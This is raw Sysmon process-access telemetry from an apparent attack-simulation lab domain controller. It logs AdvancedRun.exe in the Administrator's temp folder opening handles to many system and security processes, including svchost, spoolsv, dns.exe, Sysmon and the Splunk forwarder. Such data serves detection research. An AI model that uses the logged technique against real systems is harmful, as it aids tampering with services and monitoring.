19:56:09.238{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.237{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.237{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.236{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.236{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.236{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.236{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.236{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.236{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.236{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.236{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.236{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.235{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.233{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.233{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.233{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.232{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 